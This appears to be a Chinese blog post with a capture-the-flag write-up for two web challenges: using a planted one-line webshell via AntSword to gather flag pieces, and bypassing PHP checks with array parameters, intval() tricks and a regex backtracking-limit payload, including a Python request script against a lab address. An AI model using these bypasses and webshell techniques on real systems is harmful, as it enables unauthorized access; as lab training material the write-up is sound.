0
点赞
收藏
分享

微信扫一扫

Chromium127编译指南 Linux篇 - 编译前环境搭建(一)

mafa1993 2024-11-08 阅读 29

where_is_the_flag

1.打开环境,上面有一句话木马,直接蚁剑上

flag1:蚁剑连接上就可以直接看见,FLAG1:Yunxi{d0c0

flag2:在根目录下就有   797a-4697-

 

flag3: 在主页面有一个start.sh里面有提示信息  

4dfe-9b48-50ff544c2273}

 start.sh的内容

#!/bin/sh
sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php
echo ${FLAG:10:10} > /flag2
export FLAG3=${FLAG:20}
FLAG3=${FLAG:20}
export FLAG="flag"
FLAG="flag"
httpd -D FOREGROUND

解释如下

sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php:这行命令使用sed(流编辑器)来处理/var/www/localhost/htdocs/flag.php文件。-i选项表示直接修改文件。s/{{FLAG1}}/${FLAG:0:10}/是sed的替换命令,它将文件中的{{FLAG1}}替换为环境变量FLAG的前10个字符。

echo ${FLAG:10:10} > /flag2:这行命令使用echo输出FLAG环境变量的第11到第20个字符(因为索引从0开始),并将输出重定向到/flag2文件。

export FLAG3=${FLAG:20}:这行命令将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3环境变量,并使用export命令使其在当前shell及其子进程中可用。

FLAG3=${FLAG:20}:这行命令与上一行类似,也是将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3变量,但没有使用export,所以这个变量只在当前shell中有效。

export FLAG="flag":这行命令将FLAG环境变量的值设置为字符串"flag",并使用export命令使其在当前shell及其子进程中可用

打开终端,执行命令echo $FLAG3

绕进你的心里

1.代码审计

<?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){   //数组绕过
    echo "md5绕过了!";
    if(preg_match("/[0-9]/", $num)){     //匹配数字
        die('你干嘛?哎哟!');
    }
    elseif(intval($num)){                //匹配字符
        if(preg_match('/.+?ISCTF/is', $str)){
            die("再想想!");
        }
        if(stripos($str, '2023ISCTF') === false){
            die("就差一点点啦!");
        }
        echo $flag;
    }
}
?> 

2.payload:后面两个数组绕过不解释了,解释一下前面的绕过

?zhurong[]=1&hongmeng[]=2&shennong[]=3

第二层,绕过intval()限制,数字绕过

intval() 转换数组类型时,不关心数组中的内容,只判断数组中有没有元素。

3.intval()限制字符绕过

第三层的绕过关键在pan_gu利用正则最大回溯绕过,看到'/.+?ISCTF/is'这种就要想到了,我们通过发送超长字符串的方式,使正则执行失败,最后绕过目标对PHP语言的限制。

网上找的通用回溯poc如下,需要对应不同题目改脚本:

import requests

url = "http://172.16.17.201:50125/?zhurong[]=1&hongmeng[]=2&shennong[]=3"

data = {

    'pan_gu': 'aaaaaaaaaa' * 250000 + '2023ISCTF'

}

r = requests.post(url, data=data)

print(r.text)

举报

相关推荐

0 条评论